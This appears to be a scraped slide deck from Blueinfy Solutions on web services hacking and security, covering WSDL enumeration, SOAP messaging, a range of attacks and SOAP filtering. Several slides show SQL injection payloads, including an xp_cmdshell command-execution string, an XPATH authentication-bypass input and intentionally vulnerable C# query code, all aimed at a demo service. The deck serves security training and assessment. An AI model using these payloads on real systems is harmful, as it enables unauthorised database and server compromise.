Global Windows Azure Bootcamp - San DiegoGlobal Windows Azure Bootcamp - San Diego
Global Windows Azure Bootcamp - San Diego
 
Extending drupal authentication
Extending drupal authenticationExtending drupal authentication
Extending drupal authentication
 
SOA and WCF (Windows Communication Foundation) basics
SOA and WCF (Windows Communication Foundation) basicsSOA and WCF (Windows Communication Foundation) basics
SOA and WCF (Windows Communication Foundation) basics
 
Introduction to Mod security session April 2016
Introduction to Mod security session April 2016Introduction to Mod security session April 2016
Introduction to Mod security session April 2016
 
Web Api services using IBM Datapower
Web Api services using IBM DatapowerWeb Api services using IBM Datapower
Web Api services using IBM Datapower
 
FS_Usage_Scenarios
FS_Usage_ScenariosFS_Usage_Scenarios
FS_Usage_Scenarios
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
 
AppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services HackingAppSec 2007 - .NET Web Services Hacking
AppSec 2007 - .NET Web Services Hacking
 
dist-access. access control in distributed systemspdf
dist-access. access control in distributed systemspdfdist-access. access control in distributed systemspdf
dist-access. access control in distributed systemspdf
 
Azure platform for customers
Azure platform for customersAzure platform for customers
Azure platform for customers
 
Windows Azure
Windows AzureWindows Azure
Windows Azure
 

More from Blueinfy Solutions

Mobile Application Scan and Testing
Mobile Application Scan and TestingMobile Application Scan and Testing
Mobile Application Scan and TestingBlueinfy Solutions
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseBlueinfy Solutions
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Blueinfy Solutions
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security TestingBlueinfy Solutions
 
Automation In Android & iOS Application Review
Automation In Android & iOS 	Application Review�Automation In Android & iOS 	Application Review�
Automation In Android & iOS Application ReviewBlueinfy Solutions
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SASTBlueinfy Solutions
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectBlueinfy Solutions
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionBlueinfy Solutions
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationBlueinfy Solutions
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approachBlueinfy Solutions
 
HTTP protocol and Streams Security
HTTP protocol and Streams SecurityHTTP protocol and Streams Security
HTTP protocol and Streams SecurityBlueinfy Solutions
 

More from Blueinfy Solutions (20)

Mobile Application Scan and Testing
Mobile Application Scan and TestingMobile Application Scan and Testing
Mobile Application Scan and Testing
 
Mobile security chess board - attacks & defense
Mobile security chess board - attacks & defenseMobile security chess board - attacks & defense
Mobile security chess board - attacks & defense
 
Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013Mobile code mining for discovery and exploits nullcongoa2013
Mobile code mining for discovery and exploits nullcongoa2013
 
iOS Application Security Testing
iOS Application Security TestingiOS Application Security Testing
iOS Application Security Testing
 
Html5 on mobile
Html5 on mobileHtml5 on mobile
Html5 on mobile
 
Android secure coding
Android secure codingAndroid secure coding
Android secure coding
 
Android attacks
Android attacksAndroid attacks
Android attacks
 
Automation In Android & iOS Application Review
Automation In Android & iOS 	Application Review�Automation In Android & iOS 	Application Review�
Automation In Android & iOS Application Review
 
Source Code Analysis with SAST
Source Code Analysis with SASTSource Code Analysis with SAST
Source Code Analysis with SAST
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
CSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open RedirectCSRF, ClickJacking & Open Redirect
CSRF, ClickJacking & Open Redirect
 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
 
Defending against Injections
Defending against InjectionsDefending against Injections
Defending against Injections
 
XPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal InjectionXPATH, LDAP and Path Traversal Injection
XPATH, LDAP and Path Traversal Injection
 
Blind SQL Injection
Blind SQL InjectionBlind SQL Injection
Blind SQL Injection
 
Application fuzzing
Application fuzzingApplication fuzzing
Application fuzzing
 
SQL injection basics
SQL injection basicsSQL injection basics
SQL injection basics
 
Applciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumerationApplciation footprinting, discovery and enumeration
Applciation footprinting, discovery and enumeration
 
Assessment methodology and approach
Assessment methodology and approachAssessment methodology and approach
Assessment methodology and approach
 
HTTP protocol and Streams Security
HTTP protocol and Streams SecurityHTTP protocol and Streams Security
HTTP protocol and Streams Security
 

Recently uploaded

Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastUXDXConf
 
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...marcuskenyatta275
 
The UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, OcadoThe UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, OcadoUXDXConf
 
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...FIDO Alliance
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoTAnalytics
 
THE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in  GERMANY for 2024: IPTVreelTHE BEST IPTV in  GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreelreely ones
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...FIDO Alliance
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKUXDXConf
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfFIDO Alliance
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomCzechDreamin
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeCzechDreamin
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfFIDO Alliance
 
AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekCzechDreamin
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Julian Hyde
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...CzechDreamin
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsUXDXConf
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftshyamraj55
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxJennifer Lim
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsStefano
 
Top 10 Symfony Development Companies 2024
Top 10 Symfony Development Companies 2024Top 10 Symfony Development Companies 2024
Top 10 Symfony Development Companies 2024TopCSSGallery
 

Recently uploaded (20)

Designing for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at ComcastDesigning for Hardware Accessibility at Comcast
Designing for Hardware Accessibility at Comcast
 
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
TEST BANK For, Information Technology Project Management 9th Edition Kathy Sc...
 
The UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, OcadoThe UX of Automation by AJ King, Senior UX Researcher, Ocado
The UX of Automation by AJ King, Senior UX Researcher, Ocado
 
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
FDO for Camera, Sensor and Networking Device – Commercial Solutions from VinC...
 
IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024IoT Analytics Company Presentation May 2024
IoT Analytics Company Presentation May 2024
 
THE BEST IPTV in GERMANY for 2024: IPTVreel
THE BEST IPTV in  GERMANY for 2024: IPTVreelTHE BEST IPTV in  GERMANY for 2024: IPTVreel
THE BEST IPTV in GERMANY for 2024: IPTVreel
 
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
ASRock Industrial FDO Solutions in Action for Industrial Edge AI _ Kenny at A...
 
Connecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAKConnecting the Dots in Product Design at KAYAK
Connecting the Dots in Product Design at KAYAK
 
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdfLinux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
Linux Foundation Edge _ Overview of FDO Software Components _ Randy at Intel.pdf
 
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone KomSalesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
Salesforce Adoption – Metrics, Methods, and Motivation, Antone Kom
 
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi IbrahimzadeFree and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
Free and Effective: Making Flows Publicly Accessible, Yumi Ibrahimzade
 
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdfHow Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
How Red Hat Uses FDO in Device Lifecycle _ Costin and Vitaliy at Red Hat.pdf
 
AI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří KarpíšekAI revolution and Salesforce, Jiří Karpíšek
AI revolution and Salesforce, Jiří Karpíšek
 
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
Measures in SQL (a talk at SF Distributed Systems meetup, 2024-05-22)
 
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
Integrating Telephony Systems with Salesforce: Insights and Considerations, B...
 
Strategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering TeamsStrategic AI Integration in Engineering Teams
Strategic AI Integration in Engineering Teams
 
Oauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoftOauth 2.0 Introduction and Flows with MuleSoft
Oauth 2.0 Introduction and Flows with MuleSoft
 
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptxWSO2CONMay2024OpenSourceConferenceDebrief.pptx
WSO2CONMay2024OpenSourceConferenceDebrief.pptx
 
PLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. StartupsPLAI - Acceleration Program for Generative A.I. Startups
PLAI - Acceleration Program for Generative A.I. Startups
 
Top 10 Symfony Development Companies 2024
Top 10 Symfony Development Companies 2024Top 10 Symfony Development Companies 2024
Top 10 Symfony Development Companies 2024
 

Web Services Hacking and Security

  • 1. Web Services Hacking and Security
  • 2. Recent analysis of Cloud App • Enterprise Content Management – Cloud App • Technologies & Components – APIs, OAuth, SAML, SOAP, Ajax etc. • Traditional Scanning – What to scan  • Hacking and Hands-On – SQL injection over APIs – XSS on Mobile interface – Authorization bypass (Look at other’s content) – Information leaks through JSON fuzzing – CSRF – Virtual Sand Box bypasses – Mobile interface compromised
  • 3. Attacks • Vulnerabilities in cloud infrastructures could allow attackers to locate and eavesdrop on targeted virtual machines (VMs) anywhere in the cloud. • DDoS attack rains down on Amazon cloud • Cross-VM side-channel attacks to extract information from a target VM on the same machine. • The use of virtualization by cloud service providers to host virtual machines belonging to multiple customers on a shared physical infrastructure is opening up fresh data leak risks, a research report warns.
  • 4. What is common in all? • All over Web and HTTP • Web Security and Hacking is very relevant for Cloud • Cloud = Web 2.0 + SOA + Something-Else • Lot of hacks are already happening on Cloud apps over HTTP • Game is changing and becoming interesting …
  • 5. Security! • Web service - evolving as new attack point in application framework. • Toolkits and Exploits are coming up • Too many protocols and confusion • Race for deployment – poor implementation • Cases and attacks are growing with growth in business usage
  • 6. Web Services Client HTTP POST SOAP Envelope Web Server 80/443 Web Services Engine Web Services Binaries Web Services Deployment Shell Web Services Code & Components User ControlledVendor ControlledIn TransitEnd Client Security!
  • 7. Web Services Engine Web Services Resource Defense Controls Web Services Deployment Web Services Code Database File System Network Resource Attack Agent Attack Method Attack Vector Exploit Vulnerability In Transit Security!
  • 8. Assessment strategies Web Services Risk Model Web Services Defense Controls Blackbox Assessment Whitebox Assessment
  • 9. Technology Deployment DB Internet DMZ Trusted Internal/Corporate Web Service Client Web Server (IIS/Apache) Application Servers (.Net/Tomcat) Web Services Container (Axis) SOAP Serves SOAP over HTTP/HTTPS XML Parsing WSDL Transport etc. Web Services Code resides
  • 10. Web services evaluation methodology Footprinting Discovery Public domain search Enumeration Manual Audit Auto Audit Defense
  • 11. • In transit Sniffing or Spoofing • WS-Routing security concern • Replay attacks Risk - In transit
  • 12. Risk - Web services Engine • Buffer overflow • XML parsing attacks • Spoiling Schema • Complex or Recursive structure as payload • Denial of services • Large payload
  • 13. Web services Deployment - Risk • Fault code leaks • Permissions & Access issues • Poor policies • Customized error leakage • Authentication and Certification
  • 14. Web services User code - Risk • Parameter tampering • WSDL probing • SQL/LDAP/XPATH/OS command injection • Virus/Spyware/Malware injection • Bruteforce • Data type mismatch • Content spoofing • Session tampering • Format string • Information leakage • Authorization
  • 15. © Blueinfy Solutions Pvt. Ltd. Scanning SOA
  • 16. Web Service Search • Search in the public domain • Tool – Search Engines • Google – An excellent tool • Look for wsdl,asmx,jws etc. • Filetype and allinurl are best friends
  • 17. Technology Identification • Platform on which Web services are running • Configuration and Structures • File extensions • Path discovery Very useful information!
  • 18. Technology Identification • Location can be obtained from UDDI as well, if already published. • WSDL location [ Access Point ] http://192.168.11.2/ws/dvds4less.asmx?wsdl .asmx – indicates .Net server from MS
  • 19. Technology Identification • Similarly, .jws – for Java web services • /ws/ - in the path indicates web services • MS-SOAPToolkit can be identified as well C:> nc 192.168.11.2 80 HEAD / HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:48:20 GMT X-Powered-By: ASP.NET Connection: Keep-Alive Content-Length: 7565 Content-Type: text/html Set-Cookie: ASPSESSIONIDSSSRQDRC=LMMPKHNAAOFDHMIHAODOJHCO; path=/ Cache-control: private
  • 20. Technology Identification • Resource header throws up some information as well C:> nc 192.168.11.2 80 HEAD /ws/dvds4less.asmx HTTP/1.0 HTTP/1.1 500 Internal Server Error Server: Microsoft-IIS/5.0 Date: Tue, 28 Sep 2004 18:50:09 GMT X-Powered-By: ASP.NET X-AspNet-Version: 1.1.4322 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 3026
  • 21. WSDL Scanning/Enumeration • What is WSDL? • What information can one enumerate from WSDL? • WSDL exposure: Threat or not?
  • 22. WSDL • Web Services Definition Language • Similar to IDL for remote calls used in CORBA or other remote invoke methods. • Contains detail of methods • Types of I/O • Parameters of methods • It is an XML document with standards.
  • 24. WSDL <Service> <service name="dvds4less"> <port name="dvds4lessSoap" binding="s0:dvds4lessSoap"> <soap:address location="http://192.168.11.2/ws/dvds4less.asmx"/> </port> </service> Where is the call going to go? This is where the service is listening.
  • 25. WSDL <portType> <portType name="dvds4lessSoap"> <operation name="Intro"> <input message="s0:IntroSoapIn"/> <output message="s0:IntroSoapOut"/> </operation> <operation name="getProductInfo"> <input message="s0:getProductInfoSoapIn"/> <output message="s0:getProductInfoSoapOut"/> </operation> <operation name="getRebatesInfo"> <input message="s0:getRebatesInfoSoapIn"/> <output message="s0:getRebatesInfoSoapOut"/> </operation> </portType> Methods one can call
  • 26. WSDL <Message> <portType name="dvds4lessSoap"> <operation name="getProductInfo"> <input message="s0:getProductInfoSoapIn"/> <output message="s0:getProductInfoSoapOut"/> </operation> </portType> <message name="getProductInfoSoapIn"> <part name="parameters" element="s0:getProductInfo"/> </message> <message name="getProductInfoSoapOut"> <part name="parameters" element="s0:getProductInfoResponse"/> </message>
  • 27. WSDL <Types> <s:element name="getProductInfo"> <s:complexType> <s:sequence> <s:element minOccurs="0" maxOccurs="1" name="id" type="s:string"/> </s:sequence> </s:complexType> </s:element> <s:element name="getProductInfoResponse"> <s:complexType> <s:sequence> <s:element minOccurs="0" maxOccurs="1" name="getProductInfoResult" type="s:string"/> </s:sequence> </s:complexType> </s:element> <message name="getProductInfoSoapIn"> <part name="parameters" element="s0:getProductInfo"/> </message> <message name="getProductInfoSoapOut"> <part name="parameters" element="s0:getProductInfoResponse"/> </message>
  • 28. WSDL Profile after Scan Methods INPUT OUTPUT Intro - None - String getProductInfo String String getRebatesInfo String String
  • 29. © Blueinfy Solutions Pvt. Ltd. SOAP in Action
  • 30. How to access? • Knowing WSDL profile – What next? • Access web services – see what goodies you can get • How?
  • 31. How to access SOAP? • Simple Object Access Protocol • Invoking objects on remote machine • I/O with remote objects • It is XML-based messaging • Works over HTTP/HTTPS and on few other protocols • That is why firewall cannot block them. • Attacks are easy and possible.
  • 32. SOAP request <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1</id> </getProductInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method Call Input to the method
  • 33. SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/</getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> SOAP Envelope Method response Output to the method
  • 34. © Blueinfy Solutions Pvt. Ltd. SOA Attacks
  • 35. AV 1 - XML poisoning • XML node manipulation • Attack on parsing logic – SAX – DOM • Can be lethal – DoS or breaking execution logic
  • 36. XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street</Address> <Email>john@smith.com</Email> <PhoneNumber>3809922347</PhoneNumber> </ CustomerRecord>
  • 38. XML poisoning <CustomerRecord> <CustomerNumber>289001</CustomerNumber> <FirstName>John</FirstName> <FirstName>John</FirstName> ... 100 time… <FirstName>John</FirstName> <LastName>Smith</LastName> <Address>Apt 31, 1st Street<Address> <Email>john@smith.com<Email> <PhoneNumber>3809922347<PhoneNumber> </ CustomerRecord>
  • 39. Parameter tampering & Fault code leakage • Fault code of web services spit lot of information about internal workings. • This attack can fetch internal paths, database interfaces etc. • Fault code is part of SOAP envelope and this helps an attacker to make logical deduction about assets.
  • 40. SOAP request <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getRebatesInfo xmlns="http://tempuri.org/"> <fileinfo>abx.xyz</fileinfo> </getRebatesInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method Call Input to the method Forcing Fault Code Source of Enumeration
  • 41. SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Could not find file &amp;quot;c:inetpubwwwrootrebatesabx.xyz&amp;quot;.</faultstring> <detail /> </soap:Fault> </soap:Body> </soap:Envelope> Path Enumeration Fault Code
  • 42. AV 3 - SQL injection • SQL injection can be done using SOAP traffic. • It is innovative way of identifying database interface points. • One can leverage xp_cmdshell via SOAP. • Back end database can be compromised using this attack.
  • 43. SOAP request <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1</id> </getProductInfo> </soap:Body> </soap:Envelope> SOAP Envelope Method Call Input to the method
  • 44. SOAP request <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Product Information
  • 45. SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <soap:Fault> <faultcode>soap:Server</faultcode> <faultstring>Server was unable to process request. --&gt; Cannot use empty object or column names. Use a single space if necessary.</faultstring> <detail /> </soap:Fault> </soap:Body> Indicates SQL Server Place for SQL Injection Fault Code
  • 46. SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1 or 1=1</id> </getProductInfo> </soap:Body> </soap:Envelope> Popular SQL Injection Fault Code
  • 47. SOAP request <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ /(7)Lawrence of Arabia($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> Works!! Entire Table Is out
  • 48. SOAP response <?xml version="1.0" encoding="utf-16"?> <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfo xmlns="http://tempuri.org/"> <id>1;EXEC master..xp_cmdshell 'dir c: > c:inetpubwwwrootwsdir.txt'</id> </getProductInfo> </soap:Body> </soap:Envelope> Exploiting this Vulnerability Exploit code
  • 49. SOAP request <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <soap:Body> <getProductInfoResponse xmlns="http://tempuri.org/"> <getProductInfoResult>/(1)Finding Nemo($14.99)/ </getProductInfoResult> </getProductInfoResponse> </soap:Body> </soap:Envelope> Works!! Looks Normal response
  • 50. SOAP request But … Code got executed Looks Normal response Got Admin via cmdshell
  • 51. AV 4 – XPATH injection • XPATH is new way of querying XML documents. • This attack works nicely on web services since they use XML extensively. • Developer’s loophole can be leveraged with an exploit. • XPATH query crafting is next generation attack methods.
  • 52. XPATH Injection - Basics • XPATH is a language defined to find information from XML document. • As XPATH name suggests it indeed uses path to traverse through nodes of XML document and look for specific information from the document. • XPATH provides expressions like slash (/), double slash (//), dot(.), double dot (..), @, =, <, > etc. It helps in traversing through XML document.
  • 53. XPATH – Vulnerable Code string fulltext = ""; string coString = "Provider=SQLOLEDB;Server=(local);database=order;User ID=sa;Password=mypass"; SqlXmlCommand co = new SqlXmlCommand(coString); co.RootTag="Credential"; co.CommandType = SqlXmlCommandType.Sql; co.CommandText = "SELECT * FROM users for xml Auto"; XmlReader xr = co.ExecuteXmlReader(); xr.MoveToContent(); fulltext = xr.ReadOuterXml(); XmlDocument doc = new XmlDocument(); doc.LoadXml(fulltext); string credential = "//users[@username='"+user+"' and @password='"+pass+"']"; XmlNodeList xmln = doc.SelectNodes(credential); string temp; if(xmln.Count > 0) { //True } else //false
  • 54. Attacking XPATH point • //users[@username='"+user+"' and @password='"+pass+"']"; • XPATH parsing can be leveraged by passing following string ' or 1=1 or ''=‘ • This will always true on the first node and user can get access as who ever is first user. • //users[@username='' or 1=1 or ''='' and @password='any'] Bingo!
  • 55. AV 6 – LDAP injection • LDAP authentication in place • Possible to manipulate LDAP queries • May leads to enumeration OR manipulation • Interesting attack vector • Fault code leaks LDAP interface
  • 56. AV 7 – File System access • Identifying file system points • Directory traversing & Access • Leads to file access and source code exposure • Lethal if found!
  • 57. AV 7 – SOAP brute forcing • SOAP envelope takes user & pass accounts. • It is possible to bruteforce SOAP envelope and look for specific responses. • This is a possible attack which can get into the system. • Analyzing SOAP response is key for this set of attack.
  • 58. AV 8 – Parameter overflow • Adding large buffers to XML nodes • Depending on code controls – It may fail in handling • Breaking the application • May compromise as well • Traditional buffer overflow type attacks
  • 59. AV 9 – Operating System access • Point to OS • Remote command execution is possible • Either by “|” or “;” • Attack is very much possible • Leads to admin/root on the box…
  • 60. AV 10 – Session hijacking • Web services can maintain sessions • [WebMethod(EnableSession=true)] • Possible to reverse engineer session • Cookie tempering is reality… • Can be compared to traditional web application session.
  • 61. Other attacks • External referencing – XML schema • XSS attack • In transit attacks – replay and spoofing
  • 62. © Blueinfy Solutions Pvt. Ltd. Securing SOA
  • 63. Defense 1: SOAP filtering • Regular firewall will not work • Content filtering on HTTP will not work either since it is SOAP over HTTP/HTTPS • SOAP level filtering and monitoring would require • ISAPI level filtering is essential • SOAP content filtering – products or in-house
